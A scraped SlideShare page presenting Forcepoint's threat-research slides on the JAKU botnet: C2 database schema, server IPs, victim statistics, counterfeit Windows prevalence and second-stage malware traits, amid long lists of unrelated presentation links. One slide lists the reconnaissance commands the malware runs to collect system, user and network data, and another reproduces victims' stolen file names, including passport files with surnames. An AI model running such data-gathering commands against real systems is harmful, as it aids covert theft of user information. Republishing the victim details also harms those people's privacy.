Actividades+de+ampliación+y+refuerzo+lengua+castellana+2º+esoActividades+de+ampliación+y+refuerzo+lengua+castellana+2º+eso
Actividades+de+ampliación+y+refuerzo+lengua+castellana+2º+eso
 
Expediente de atención a la diversidad
Expediente de atención a la diversidadExpediente de atención a la diversidad
Expediente de atención a la diversidad
 
Rice University_Python_Part 2_Certificate
Rice University_Python_Part 2_CertificateRice University_Python_Part 2_Certificate
Rice University_Python_Part 2_Certificate
 
Imagine
ImagineImagine
Imagine
 
Plan de negocios
Plan de negociosPlan de negocios
Plan de negocios
 
Rice University_Python_Part 1_Certificate
Rice University_Python_Part 1_CertificateRice University_Python_Part 1_Certificate
Rice University_Python_Part 1_Certificate
 
Direito Constitucional - Justiça Federal
Direito Constitucional - Justiça Federal Direito Constitucional - Justiça Federal
Direito Constitucional - Justiça Federal
 
Beyond disciplines: IMAGinE research differently
Beyond disciplines: IMAGinE research differentlyBeyond disciplines: IMAGinE research differently
Beyond disciplines: IMAGinE research differently
 
Verbos irregulares em português
Verbos irregulares em portuguêsVerbos irregulares em português
Verbos irregulares em português
 
Direito Constitucional - Art. 42 da CF 88
Direito Constitucional - Art. 42 da CF 88Direito Constitucional - Art. 42 da CF 88
Direito Constitucional - Art. 42 da CF 88
 
Direito Constitucional - Direitos Sociais
Direito Constitucional - Direitos SociaisDireito Constitucional - Direitos Sociais
Direito Constitucional - Direitos Sociais
 
Forcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security PredictionsForcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security Predictions
 
Direito Administrativo - Art. 41 da CF 88
Direito Administrativo - Art. 41 da CF 88Direito Administrativo - Art. 41 da CF 88
Direito Administrativo - Art. 41 da CF 88
 
Machine Learning for Threat Detection
Machine Learning for Threat DetectionMachine Learning for Threat Detection
Machine Learning for Threat Detection
 
SucessfulInsiderThreat
SucessfulInsiderThreatSucessfulInsiderThreat
SucessfulInsiderThreat
 
Senior Finance SG pages
Senior Finance SG pagesSenior Finance SG pages
Senior Finance SG pages
 
Xiv concurso literario semana santa de cuenca
Xiv concurso literario semana santa de cuencaXiv concurso literario semana santa de cuenca
Xiv concurso literario semana santa de cuenca
 

Similar to JAKU Botnet Analysis

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
CODE BLUE
 

Similar to JAKU Botnet Analysis (20)

BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systems
 
StealthWatch & Point-of-Sale (POS) Malware
StealthWatch & Point-of-Sale (POS) Malware StealthWatch & Point-of-Sale (POS) Malware
StealthWatch & Point-of-Sale (POS) Malware
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
 
Detecting Hacks: Anomaly Detection on Networking Data
Detecting Hacks: Anomaly Detection on Networking DataDetecting Hacks: Anomaly Detection on Networking Data
Detecting Hacks: Anomaly Detection on Networking Data
 
Itech 1005
Itech 1005Itech 1005
Itech 1005
 
Honeypot- An Overview
Honeypot- An OverviewHoneypot- An Overview
Honeypot- An Overview
 
Detecting Hacks: Anomaly Detection on Networking Data
Detecting Hacks: Anomaly Detection on Networking DataDetecting Hacks: Anomaly Detection on Networking Data
Detecting Hacks: Anomaly Detection on Networking Data
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Honeypot Project
Honeypot ProjectHoneypot Project
Honeypot Project
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral Analytics
 
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Jeff Simpson - Cyber Maneuver Warfare and Active Cyber Defense - from ICCWS 16
Jeff Simpson - Cyber Maneuver Warfare and Active Cyber Defense - from ICCWS 16 Jeff Simpson - Cyber Maneuver Warfare and Active Cyber Defense - from ICCWS 16
Jeff Simpson - Cyber Maneuver Warfare and Active Cyber Defense - from ICCWS 16
 
Tools.pptx
Tools.pptxTools.pptx
Tools.pptx
 
Defining Cyber Crime
Defining Cyber CrimeDefining Cyber Crime
Defining Cyber Crime
 
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
 
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
 

More from Napier University

More from Napier University (20)

Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systems
 
Networks
NetworksNetworks
Networks
 
Memory, Big Data and SIEM
Memory, Big Data and SIEMMemory, Big Data and SIEM
Memory, Big Data and SIEM
 
What is Cyber Data?
What is Cyber Data?What is Cyber Data?
What is Cyber Data?
 
Open Source Intelligence
Open Source IntelligenceOpen Source Intelligence
Open Source Intelligence
 
10. Data to Information: NumPy and Pandas
10. Data to Information: NumPy and Pandas10. Data to Information: NumPy and Pandas
10. Data to Information: NumPy and Pandas
 
2. Defence Systems
2. Defence Systems2. Defence Systems
2. Defence Systems
 
1. Cyber and Intelligence
1. Cyber and Intelligence1. Cyber and Intelligence
1. Cyber and Intelligence
 
The Road Ahead for Ripple, Marjan Delatinne
The Road Ahead for Ripple, Marjan DelatinneThe Road Ahead for Ripple, Marjan Delatinne
The Road Ahead for Ripple, Marjan Delatinne
 
Delivering The Tel Aviv Stock Exchange Securities, Duncan Johnston-Watt
Delivering The Tel Aviv Stock Exchange Securities, Duncan Johnston-Watt Delivering The Tel Aviv Stock Exchange Securities, Duncan Johnston-Watt
Delivering The Tel Aviv Stock Exchange Securities, Duncan Johnston-Watt
 
ARTiFACTS, Emma Boswood
ARTiFACTS, Emma BoswoodARTiFACTS, Emma Boswood
ARTiFACTS, Emma Boswood
 
RMIT Blockchain Innovation Hub, Chris Berg
RMIT Blockchain Innovation Hub, Chris BergRMIT Blockchain Innovation Hub, Chris Berg
RMIT Blockchain Innovation Hub, Chris Berg
 
Keynote, Naseem Naqvi
Keynote, Naseem Naqvi Keynote, Naseem Naqvi
Keynote, Naseem Naqvi
 
Browser-based Crypto M, C. F Mondschein
Browser-based Crypto M, C. F MondscheinBrowser-based Crypto M, C. F Mondschein
Browser-based Crypto M, C. F Mondschein
 
Should we transform or adapt to blockchain - a public sector perspective?, Al...
Should we transform or adapt to blockchain - a public sector perspective?, Al...Should we transform or adapt to blockchain - a public sector perspective?, Al...
Should we transform or adapt to blockchain - a public sector perspective?, Al...
 
IoT device attestation system using blockchain, Alistair Duke
IoT device attestation system using blockchain, Alistair DukeIoT device attestation system using blockchain, Alistair Duke
IoT device attestation system using blockchain, Alistair Duke
 
Robust Programming of Smart Contracts in Solidity+, RK Shyamasundar
Robust Programming of Smart Contracts in Solidity+, RK ShyamasundarRobust Programming of Smart Contracts in Solidity+, RK Shyamasundar
Robust Programming of Smart Contracts in Solidity+, RK Shyamasundar
 
Using Blockchain for Evidence Purpose, Rafael Prabucki
Using Blockchain for Evidence Purpose, Rafael PrabuckiUsing Blockchain for Evidence Purpose, Rafael Prabucki
Using Blockchain for Evidence Purpose, Rafael Prabucki
 
Cryptocurrencies and cyberlaundering- the need for regulation, Gian Marco Bov...
Cryptocurrencies and cyberlaundering- the need for regulation, Gian Marco Bov...Cryptocurrencies and cyberlaundering- the need for regulation, Gian Marco Bov...
Cryptocurrencies and cyberlaundering- the need for regulation, Gian Marco Bov...
 
Emerging Regulatory Approaches to Blockchain-based Token Economy, Agata Fereirra
Emerging Regulatory Approaches to Blockchain-based Token Economy, Agata FereirraEmerging Regulatory Approaches to Blockchain-based Token Economy, Agata Fereirra
Emerging Regulatory Approaches to Blockchain-based Token Economy, Agata Fereirra
 

Recently uploaded

Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
negromaestrong
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
MateoGardella
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
MateoGardella
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 

Recently uploaded (20)

Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docx
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 

JAKU Botnet Analysis

  • 1. Copyright © 2016 Forcepoint. All rights reserved. JAKU – Analysis of a Botnet Andy Settle Head of Special Investigations
  • 2. Copyright © 2016 Forcepoint. All rights reserved. | 2 SPECIAL INVESTIGATIONS “We inform and shape the understanding of the decision influencers and decision makers around the use of our services. We create a credible value proposition for 'why Forcepoint', we are a discriminator for our Customers when they may look elsewhere.” “We add value in difficult circumstances. If a Customer is under a spear phishing attack and wants to know what the intent is, we are here to do the analysis. When a customers is informed that they have been breached we can help provide high quality actionable intelligence to those responsible for responding to the incident.” “At times, we perform the activities that are too sensitive, too complicated, too complex, too time-consuming and occasionally, just too weird for others.”
  • 3. Copyright © 2016 Forcepoint. All rights reserved. | 3Copyright © 2016 Forcepoint. All rights reserved. | 3 JAKU- Analysis of a Botnet
  • 4. Copyright © 2016 Forcepoint. All rights reserved. | 4 JAKU – HEADLINES Piracy. The prevalence of users/victims who are running counterfeit installations of Microsoft Windows®, downloading ‘warez’ software and using BitTorrent software to illegally obtain these as well as other copyright protected material, such as movies and music. C2 Databases. The use of SQLite files to collate and manage the botnet members, their structure and the use of version numbering. Poisoned BitTorrents. The technique of threat actors deploying torrent files onto torrent sites that are pre-infected with malware has not been widely seen before, especially with respect to BitTorrent-types of attack. This behaviour is difficult to trace and track and is indiscriminate in its infection pattern unless it has some means of targeting desired demographics. Resilient C2 Channels. Stage two of one piece of malware has three inbuilt Command and Control (C2) mechanisms. This level of resilience is not accidental, but rather, such investment and effort is usually indicative of the perceived value of the target. High Value Targets. Within the noise of thousands of seemingly indiscriminate botnet victims, the JAKU campaign performs a separate, highly targeted operation. TLP - WHITE
  • 5. Copyright © 2016 Forcepoint. All rights reserved. | 5 LOOKING FOR BAD THINGS… Index of /img Icon Name Last modified Size Description ___________________________________________________________________________________________________________ [DIR] Parent Directory [IMG] near.jpg 09-Dec-2015 19:59 451M ___________________________________________________________________________________________________________ Apache/2.2.21 (Unix) DAV/2 mod_ssl/2.2.21 OpenSSL/1.0.0c PHP/5.3.8 mod_apreq2-20090110/2.7.1 mod_perl/2.0.5 Perl/v5.10.1 Server at pic3.mooo.com Port 80 TLP - WHITE
  • 6. Copyright © 2016 Forcepoint. All rights reserved. | 6 …SEEK, AND YE SHALL FIND? $ file near.jpg near.jpg: SQLite 2.x database $ sqlite near.jpg .schema CREATE TABLE child (uid TEXT PRIMARY KEY, version REAL, pip TEXT, info TEXT, infouptime INTEGER, iplist TEXT, instime INTEGER,lasttime INTEGER, downfile TEXT, downver REAL); CREATE TABLE dist2 (id INTEGER PRIMARY KEY, pubdownfile TEXT, pubdownver REAL, pubdowncnt INTEGER, pridownfile TEXT, pridownver REAL, pridowncnt INTEGER); CREATE TABLE history (id INTEGER PRIMARY KEY, uid TEXT, ctime INTEGER); CREATE TABLE tvdist (id INTEGER PRIMARY KEY, tvdownfile TEXT, tvdownver REAL, tvdowncnt INTEGER); CREATE INDEX idx_instime ON child(instime); CREATE INDEX idx_lasttime ON child(lasttime); CREATE INDEX idx_version ON child(version); TLP - WHITE
  • 7. Copyright © 2016 Forcepoint. All rights reserved. | 7 DOCUMENTING THE FINDINGS COLUMN DESCRIPTION UID A unique identifier of the victim. This allows the C2 server to track victims if and when their IP address changes. VERSION A unique identifier for the version of the malware on the victim machine. PIP The public IP address of the victim. This is updated as and when the victim machines external IP address changes. INFO The details gathered by the malware from the victim machine. INFOUPTIME The date/time that the INFO field was updated in the database. Believed to be the data/time on the C2 server. IPLIST A list of IP addresses from all the victim machines network interfaces. INSTIME The date/time that the malware was originally installed on the victim machine. LASTTIME The date/time of the last beacon received by the C2 server from the malware on the victim machine. TLP - WHITE
  • 8. Copyright © 2016 Forcepoint. All rights reserved. | 8 EXAMPLE DATA - SYSTEMINFO TLP - WHITE Host Name: *********-PC OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: ********* Registered Organization: Product ID: 00426-292-0000007-85307 Original Install Date: 12/24/2014, 2:53:55 PM System Boot Time: 5/1/2015, 9:00:02 AM System Manufacturer: Hewlett-Packard System Model: HP EliteBook 8530p System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 6 Model 23 BIOS Version: Hewlett-Packard 68PDV Ver. F.11 Windows Directory: C:Windows System Directory: C:Windowssystem32 Boot Device: DeviceHarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC+05:00) Islamabad, Karachi Total Physical Memory: 1,978 MB Available Physical Memory: 970 MB Virtual Memory: Max Size: 3,957 MB Virtual Memory: Available: 2,406 MB Virtual Memory: In Use: 1,551 MB Page File Location(s): C:pagefile.sys Domain: ********** Logon Server: *********-dC ホスト名: LENOVO-PC OS 名: Microsoft Windows 10 Home OS バージョン: 10.0.10586 N/A ビルド 10586 OS 製造元: Microsoft Corporation OS 構成: スタンドアロン ワークステーション OS ビルドの種類: Multiprocessor Free 登録されている所有者: 123 登録されている組織: プロダクト ID: 00326-10000-00000-AA381 最初のインストール日付: 2016/02/22, 11:02:21 システム起動時間: 2016/04/23, 17:46:45 システム製造元: LENOVO システム モデル: 20C5CTO1WW システムの種類: x64-based PC プロセッサ: 1 プロセッサインストール済みです。 [01]: Intel64 Family 6 Model 60 Stepping BIOS バージョン: LENOVO J9ET93WW (2.13 ), 2014/08/29 Windows ディレクトリ: C:WINDOWS システム ディレクトリ: C:WINDOWSsystem32 起動デバイス: DeviceHarddiskVolume2 システム ロケール: ja;日本語 入力ロケール: ja;日本語 タイム ゾーン: (UTC+09:00) 大阪、札幌、東京 物理メモリの合計: 3,987 MB 利用できる物理メモリ: 1,157 MB 仮想メモリ: 最大サイズ: 5,671 MB 仮想メモリ: 利用可能: 2,848 MB 仮想メモリ: 使用中: 2,823 MB ページ ファイルの場所: C:pagefile.sys ドメイン: ***** ログオン サーバー: ****
  • 9. Copyright © 2016 Forcepoint. All rights reserved. | 9 EXAMPLE DATA - PROCESSES AND FILES Image Name PID Services ========================= ======== ========================== System Idle Process 0 N/A System 4 N/A smss.exe 232 N/A ... winlogon.exe 456 N/A services.exe 500 N/A lsass.exe 516 KeyIso, SamSs lsm.exe 524 N/A svchost.exe 636 DcomLaunch, PlugPlay, Power svchost.exe 708 RpcEptMapper, RpcSs ... explorer.exe 2348 N/A hpwuschd2.exe 2448 N/A HPStatusAlerts.exe 2464 N/A Skype.exe 2488 N/A SSScheduler.exe 2504 N/A SearchIndexer.exe 3132 WSearch chrome.exe 3416 N/A svchost.exe 3440 FontCache, SSDPSRV, upnphost ... chrome.exe 4028 N/A chrome.exe 2248 N/A svchost.exe 2560 WinDefend ... taskeng.exe 608 N/A Services.exe 1408 N/A WmiPrvSE.exe 2176 N/A WmiPrvSE.exe 3088 N/A TrustedInstaller.exe 3832 TrustedInstaller TVC15.exe 3780 N/A conhost.exe 3284 N/A tasklist.exe 2872 N/A Hollywood Sex Wars.2013.720p.KOR.HDRip.H264-KTH Honeycam 2015-09-24 23-57-13 Hotaru.No.Hikari.The.Movie.2012.JAP.BDRip.x264.AC3- ADiOS Hotel.Transylvania.2012.1080p.BluRay.H264.AAC-RARBG House.of.Tolerance.201.KORSUB.x264.AC3-ADiOS 亞裔美少女被老外狂舔騷B各種姿勢狂幹加口暴指插肛門高清超長視頻 出租房露脸干成都骚货 國內騷妻艷舞自拍好身材扭的真風騷扭玩再吹簫真刺激超清 KWANGHO Passport NOORI Passport passport ID.pdf Astaneh Passport.pdf Passport Goudarzi.png Passport Rastegar.jpg Passport Taghizadeh.pdf Passport Taheri.jpg PASSPORT_LEEJAEYOUNG.jpg Ling Yok Ung Passport My Passport (F) 2015 DPRK Funding with comments DPRK 260615.doc Color coded DPRK Proposal to ****** 2016 - 2018-DM DPRK DL workshop programme DAY One. docx DPRK 2016 funding Analysis Mar 2016.xlsx TLP - WHITE
  • 10. Copyright © 2016 Forcepoint. All rights reserved. | 10 FIRST STAGE - WHAT INFORMATION IS EXFILTRATED? systeminfo net use net user tasklist /svc netstat –ano dir "%USERPROFILE%Recent“ dir "%APPDATA%MicrosoftWindowsRecent“ dir /s/b "%USERPROFILE%Favorites" TLP - WHITE
  • 11. Copyright © 2016 Forcepoint. All rights reserved. | 11 PIVOTING VIA WHAT WE NOW KNOW C2 IP ASN VICTIMS BLACK-SAPHARUS 101.99.68.5 AS45839 PIRADIUS NET 5153 BLUE-MONKEY 43.252.36.195 AS45144 Net Onboard Sdn Bhd - Quality & Reliable Cloud Hosting Provider 3925 BROWN-COOPER 103.13.229.20 AS23884 Proimage Engineering and Communication Co.,Ltd. 1184 GREEN-SOUNDFIX 27.254.44.207 AS9891 CS LOXINFO Public Company Limited. 327 GREY-THAI 202.142.223.144 AS7654 Internet Solution & Service Provider Co., Ltd. 3005 ORANGE-HOWL 27.254.96.222 AS9891 CS LOXINFO Public Company Limited. 4204 PINK-COW 27.254.55.23 AS9891 CS LOXINFO Public Company Limited. 2242 RED-RACCOON ] REDACTED [ AS45144 Net Onboard Sdn Bhd - Quality & Reliable Cloud Hosting Provider 10 RED-RACCOON ] REDACTED [ AS24218 Global Transit Communications - Malaysia 17 RED-RACCOON ] REDACTED [ AS23884 Proimage Engineering and Communication Co.,Ltd. 10 VIOLET-FOX 27.254.96.223 AS9891 CS LOXINFO Public Company Limited. 1187 YELLOW-BOA 202.150.220.93 AS38001 NewMedia Express Pte Ltd. Singapore Web Hosting Service Provider 3236 TLP - WHITE
  • 12. Copyright © 2016 Forcepoint. All rights reserved. | 12 DATA LOCATIONS & VICTIM COUNT TLP - WHITE
  • 13. Copyright © 2016 Forcepoint. All rights reserved. | 13 TOTAL NUMBER OF VICTIMS PER SERVER 0 1000 2000 3000 4000 5000 6000 Oct/2015 Nov/2015 Dec/2015 Jan/2016 Feb/2016 Mar/2016 Apr/2016 BLACK-SAPHARUS BROWN-COOPER GREY-THAI YELLOW-BOA RED-RACOON GREEN-SOUNDFIX PINK-COW ORANGE-HOWL VIOLET-FOX BLUE-MONKEY TLP - WHITE
  • 14. Copyright © 2016 Forcepoint. All rights reserved. | 14 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 04/10/2015 04/11/2015 04/12/2015 04/01/2016 04/02/2016 04/03/2016 04/04/2016 COUNTING THE NUMBER OF VICTIMS TLP - WHITE
  • 15. Copyright © 2016 Forcepoint. All rights reserved. | 15 WHAT DO WE KNOW ABOUT THE VICTIMS? Korea 42% Japan 31% China 9% US 6% OTHERS 12% Victims Countries Korean 43% Japanese 30% English 13% Chinese 10% OTHERS 4% Victim Languages TLP - WHITE
  • 16. Copyright © 2016 Forcepoint. All rights reserved. | 16 VICTIMS LOCATIONS – AMERICAS & EMEA TLP - WHITE
  • 17. Copyright © 2016 Forcepoint. All rights reserved. | 17 VICTIM LOCATIONS - APAC TLP - WHITE
  • 18. Copyright © 2016 Forcepoint. All rights reserved. | 18 VICTIMS LOCATIONS – KOREA & JAPAN TLP - WHITE
  • 19. Copyright © 2016 Forcepoint. All rights reserved. | 19 VICTIMS LOCATIONS – RUSSIA TLP - WHITE
  • 20. Copyright © 2016 Forcepoint. All rights reserved. | 20 CORPORATE VICTIMS & DWELL TIMES Corporate Victims Amongst the JAKU victims the number of corporate victims is significantly low. The proportion of victim computers that are a member of a Microsoft Windows domain, rather than workgroups or as standalone systems is less than 1% of all victims. This is calculated on 153 unique victims matching the corporate criteria. Dwell Time. The length of time a botnet victim is infected for is referred to as the dwell time. For those identified as corporate victims the mean dwell time is 93 days with the maximum observed being 348 days. For the non- corporate the figures vary wildly and in a number of cases the systems appear to be either re-infected or are infected by a number of variants (versions) of the malware. TLP - WHITE
  • 21. Copyright © 2016 Forcepoint. All rights reserved. | 21 COUNTERFEIT WINDOWS INSTALLATIONS When an Original Equipment Manufacturer (such as DELL and HP) install Microsoft Windows onto a new computer they use what is known as an OEM product ID (PID). These PID can be identified from retail ones as they contain the text “OEM“. In cases where Windows reports that the ‘model’ of the computer is ‘To be filled by O.E.M.’ and the PID contains OEM it indicates with some a)reasonable certainty, that OEM product license has been used on non OEM hardware. In other words, the system is running a counterfeit Microsoft Windows license. With this in mind, the total number of OEM PIDs identified is 12243. The number appearing to be counterfeits is 6366. For OEM licenses this indicates that 52% are likely to be counterfeits. It is reasonable to assume that the ratio can be used to infer the prevalence of counterfeits across all the JAKU victim, i.e. including those with retail PIDs. Over half of the victim computers are running counterfeit copies of Microsoft Windows. According to an IDC study “Unlicensed Software and Cybersecurity Threats” (2015): “…a clear link between unlicensed software and cybersecurity threats…. For enterprises, governments, and consumers, the obvious implication is that one way to lower cybersecurity risks is to reduce the use of unlicensed software.” However, the evidence from JAKU paints a stronger message: Whereas the enterprise may well be operating correctly with the licensing of software, there are a sizable number of the online community who do not take the same approach and this behaviour presents a threat to us all. TLP - WHITE
  • 22. Copyright © 2016 Forcepoint. All rights reserved. | 22 2ND STAGE MALWARE – R2D3 $ file download.png download.png: PNG image data, 997393152 x 167848821, 152-bit TLP - WHITE Bad RC4 Encryption LZH – LZ Huffman compression algorithm Bitdefender – AV Detection Stealth Injection – ‘explorer.exe’ Service Installation Reverse Engineered to C Source Code
  • 23. Copyright © 2016 Forcepoint. All rights reserved. | 23 SECURE FILE DELETION (REUSE) The file deletion routine has been taken and recoded from publicly available code Originally written by John Underhill, it was called ‘Secure File Shredder’ The routine used in the malware even contains the same coding errors made, where file are renamed 780 times (30 * 26) instead of the intended 30 The only difference is that the file truncation is only performed once in the malware, rather than 10 times as in Underhill's code The purpose of this code is to prevent advanced forensics techniques from being able to recover the deleted files Special Investigations contacted John who we must thank for his cooperation. TLP - WHITE
